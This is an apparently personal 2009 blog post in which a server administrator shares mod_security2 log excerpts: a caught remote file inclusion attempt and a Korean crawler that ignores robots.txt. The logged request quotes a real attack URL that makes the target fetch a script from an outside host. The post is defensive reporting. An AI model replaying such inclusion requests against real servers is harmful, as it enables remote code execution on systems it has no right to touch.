Oct 14, 2009

Persisting Korean spider, hack attempts

After yesterday's incident with a stupid bot, I thought I might give you more insight on what happens on the Net. Here is some interesting examples from mod_security2 logs on my server.



Hacking attempt

Here is a hacking attempt coming from a Russian AGAVA Internet provider:
--8920bc48-A--
[13/Oct/2009:21:03:12 +0300] 3Auc3X8AAAIAACKqdxMAAACG 89.108.122.160 58387 213.21.217.206 80
--8920bc48-B--
GET /%20%20/?subdir=http://ihent.ru/id1.txt? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: xxx
User-Agent: Mozilla/5.0
Have a look to the referred script. This is one just outputs something but often there are very sophisticated scripts. I saw one which tried to fill hard disk with various random garbage until space was exhausted. This would make ssh logins and quick recovery impossible.
There were many requests like this one, all caught.

Persisting spider

Some Korean people seem not to understand that they are not welcome. robots.txt says they are not allowed to index the site. They still do it:
--cde7352d-A--
[13/Oct/2009:21:01:16 +0300] 1SbJMn8AAAIAACJ4T0kAAABF 61.247.222.82 50325 213.21.217.206 80
--cde7352d-B--
GET /xxx HTTP/1.1
Host: xxx
Accept-Language: ja,en;q=0.5
User-Agent: Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)
Connection: close
Accept: */*
I banned one /20 subnet, now they came from a broader one. Well, I'll continue banning them. What else can I do if I do not want them here?

No comments:

Post a Comment